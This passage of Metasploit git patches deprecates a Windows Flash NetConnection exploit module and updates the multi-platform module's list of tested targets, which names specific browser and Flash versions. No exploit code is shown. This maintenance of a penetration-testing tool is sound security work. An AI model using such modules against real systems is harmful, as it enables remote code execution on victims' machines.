a/modules/exploits/windows/browser/adobe_flash_net_connection_confusion.rb +++ b/modules/exploits/windows/browser/adobe_flash_net_connection_confusion.rb @@ -10,6 +10,9 @@ class Metasploit3 < Msf::Exploit::Remote include Msf::Exploit::Powershell include Msf::Exploit::Remote::BrowserExploitServer + include Msf::Module::Deprecated + + deprecated(Date.new(2015, 7, 27), 'exploit/multi/browser/adobe_flash_net_connection_confusion') def initialize(info={}) super(update_info(info, From 2a260f0689f1d35e8f5243eaf6678c89df448e57 Mon Sep 17 00:00:00 2001 From: wchen-r7 Date: Thu, 28 May 2015 15:18:05 -0500 Subject: [PATCH 3/3] Update description --- .../multi/browser/adobe_flash_net_connection_confusion.rb | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/modules/exploits/multi/browser/adobe_flash_net_connection_confusion.rb b/modules/exploits/multi/browser/adobe_flash_net_connection_confusion.rb index 04360a9b08..8412136cf0 100644 --- a/modules/exploits/multi/browser/adobe_flash_net_connection_confusion.rb +++ b/modules/exploits/multi/browser/adobe_flash_net_connection_confusion.rb @@ -21,7 +21,8 @@ class Metasploit3 < Msf::Exploit::Remote vectors, and finally accomplish remote code execution. This module has been tested successfully on: * Windows 7 SP1 (32-bit) with IE 8, IE11 and Adobe Flash 16.0.0.305 - * Linux Mint "Rebecca" (32 bits) with Firefox 33.0 and Adobe Flash 11.2.202.404 + * Linux Mint "Rebecca" (32 bits), and Ubuntu 14.04.2 LTS with Firefox 33.0 and + Adobe Flash 11.2.202.404. }, 'License' => MSF_LICENSE, 'Author' =>